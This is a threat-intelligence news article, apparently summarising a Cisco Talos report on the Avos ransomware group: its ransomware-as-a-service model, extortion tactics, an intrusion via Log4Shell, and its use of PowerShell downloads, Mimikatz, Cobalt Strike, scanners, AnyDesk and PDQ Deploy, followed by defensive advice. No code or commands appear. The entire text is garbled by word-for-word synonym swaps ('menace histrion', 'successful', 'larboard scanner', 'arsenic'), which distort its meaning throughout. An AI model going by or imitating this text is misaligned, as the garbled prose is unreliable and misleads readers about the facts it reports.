The Avos ransomware menace histrion has precocious updated its tooling, not lone utilizing malicious bundle but besides commercialized products.
A caller report from Cisco Talos Intelligence Group exposes caller tools utilized successful Avos ransomware attacks.
Who is Avos?
Avos is simply a ransomware radical progressive since July 2021. The radical follows the Ransomware arsenic a Service concern model, which means they supply ransomware services to antithetic affiliates (Figure A).
AvosLocker presently supports Windows, Linux and ESXi environments and provides automatic highly configurable builds for the AvosLocker malware. In addition, the menace histrion provides a power sheet for the affiliates, a dialog sheet with propulsion and dependable notifications, decryption tests, and entree to a divers web of penetration testers, initial entree brokers and different contacts.
SEE: Password breach: Why popular civilization and passwords don’t premix (free PDF) (TechRepublic)
Avos besides provides calling services and DDoS attacks, which means they springiness telephone calls to victims to promote them to wage the ransom oregon execute DDoS attacks during the dialog to adhd accent to the situation.
AvosLocker has already targeted captious infrastructures successful the US, specified arsenic fiscal services, manufacturing and authorities facilities, according to the FBI. The Avos squad bash not let attacks against post-Soviet Union countries. A idiosyncratic nicknamed “Avos” has been observed trying to enlistee penetration testers with acquisition successful Active Directory networks and archetypal entree brokers connected a Russian forum.
In precocious 2021, the radical apologized for 1 onslaught aimed astatine a U.S. constabulary bureau and provided an contiguous and escaped decryption for each the information that had been encrypted. An affiliate had already successfully targeted that constabulary agency, astir apt without realizing it, truthful the Avos radical decided to supply the decryption to the agency.
AvosLocker infections & tools
Spam email campaigns are utilized arsenic an archetypal corruption vector to summation a foothold successful the targeted web earlier deploying the ransomware.
Other methods whitethorn beryllium utilized for the archetypal infection. Talos observed a lawsuit wherever the archetypal compromise was done via an ESXi server exposed connected the net implicit VMWare Horizon Unified Access Gateways (UAG) and susceptible to the Log4Shell vulnerability.
Once wrong the compromised network, the attackers utilized respective malicious tools connected endpoints. They besides utilized LoLBins (Living-off-the-Land Binaries), which are non-malicious binaries already installed connected operating systems, specified arsenic the WMI Provider Host (wmiprvse.exe).
Four weeks aft the archetypal compromise, the menace histrion ran an encoded PowerShell bid utilizing DownloadString. In the pursuing days, respective PowerShell commands were tally to download further files and tools specified arsenic Mimikatz and Cobalt Strike beacons. A larboard scanner known arsenic the SoftPerfect Network Scanner was besides downloaded and used. This larboard scanner is simply a commercially disposable tool, and Avos is known to marque predominant usage of it. The cybercriminals past modified administrative settings connected a section and distant big to assistance determination to the lateral question signifier of the attack.
Another lawsuit of the larboard scanner was transferred via AnyDesk to different server successful the compromised network.
Once each reconnaissance and lateral movements person been completed, the attackers usage a morganatic bundle deployment instrumentality named PDQ Deploy to proliferate the ransomware and different tools crossed the people network.
In the past, Avos attacks person besides revealed the usage of different tools: the PuTTY Secure transcript lawsuit instrumentality (pscp.exe), Rclone, Advanced IP scanner and WinLister.
At the extremity of the process, victims are shown a ransom enactment (Figure B).
Avos victims who bash not wage person their information sold, arsenic stated connected the Avos website: “All information is FOR SALE. Contact america with your offers. We lone merchantability information to 3rd parties if the proprietor of said information refuses to pay.”
How to support yourself from Avos
Network segmentation should beryllium implemented to trim the hazard of the full enactment being unopen down by ransomware. Strong backup policies besides request to beryllium successful spot to debar losing information successful lawsuit of a palmy attack.
Multi-factor authentication should beryllium deployed for each work facing the Internet, particularly VPN entree and webmail systems. Accesses should beryllium configured with the slightest privileges.
Antivirus and information solutions request to beryllium deployed successful bid to observe the threat. Real clip extortion should ever beryllium enabled. All systems and bundle request to beryllium up to day and patched to debar falling for communal vulnerabilities.
Training and consciousness should beryllium done for each employee, particularly to separate phishing emails oregon immoderate societal engineering instrumentality that mightiness people the user.
Disclosure: I enactment for Trend Micro, but the views expressed successful this nonfiction are mine.